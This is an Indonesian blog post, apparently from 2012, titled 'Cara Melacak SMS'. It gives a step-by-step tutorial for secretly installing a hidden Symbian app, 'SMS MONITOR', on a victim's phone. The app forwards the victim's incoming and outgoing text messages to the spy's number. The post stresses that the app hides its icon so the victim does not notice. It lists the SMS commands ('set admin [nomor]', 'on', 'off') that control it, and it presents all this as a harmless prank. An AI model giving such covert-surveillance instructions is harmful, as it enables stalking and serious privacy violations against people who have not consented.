Favorite News

Posted by : Majalah Siantar Senin, 19 Maret 2012


Majalah Siantar – Buat yang suka iseng kayak admin Majalah Siantar, Hendrikson FBI mau sharing tentang Cara melacak SMS secara gratis. Yang perlu kamu tau adalah, SMS MONITOR yaitu sebuah aplikasi berbasis Symbian yang berguna menyadap SMS korban yang kemudian dikirimkan ke nomor penyadap. Aplikasi ini dapat digunakan pada tipe symbian OS s60v3 dan s60v5.
Penyadap akan mendapatkan pesan berisi sms masuk (inbox) dan sms keluar yang berasal dari ponsel korban.

Penggunaannya cukup mudah sob, cukup dengan menyediakan 2 ponsel (1 penyadap dan 1 korban). Kalo saran saya pake hp temen aja dulu buat percobaan. Ini penting, Korban harus menggunakan symbian OS s60v3/s60v5, sedangkan Penyadap dapat menggunakan ponsel tipe apa saja


Tutorial lebih jelasnya di simak ya sob, biar ga kesasar :

Pertamax, download aplikasinya, lalu install pada ponsel korban sampai proses instalasi selesai.
Lohhh ko ngga muncul icon aplikasinya?????
Tenang gan,aplikasi ini emang dibikin hidden dari sononya, biar si korban ga curiga ada aplikasi aneh di ponselnya ( udah kelihatan usilnya   )

Kedua, siapin ponsel yang mau dipake buat nyadap, trus kirim command Set admin via sms ke nomor korban

Ketiga, tinggal pantau deh sms si korban.

Command lainnya yang perlu di ketahui :
"off"   berfungsi untuk menonaktifkan aplikasi
"on"   berfungsi untuk mengaktifkan kembali aplikasi
"set admin [nomor]"  berfungsi untuk mengganti nomor penerima sms forward dan dari  target


DOWNLOAD Sofware




Rating: 4.5
Description: Cara Melacak SMS
Reviewer: Hendrikson FBI - Itemreviewed: Cara Melacak SMS
Cara Melacak SMS

Sudahkah Anda membaca Informasi Terbaru dari Social Bookmark Indonesia ?


Leave a Reply

Berkomentarlah Yang Sopan Dan Jangan SPAM.
NOTE : Anda boleh mengcopy artikel dari Blog ini, tapi jangan lupa menyertakan sumbernya dari Majalah Siantar - Copyrights 2013. All Rights Reserved. Terimakasih telah berkunjung ...

Subscribe to Posts | Subscribe to Comments

- Copyright © Berita Terbaru. All Rights Reserved -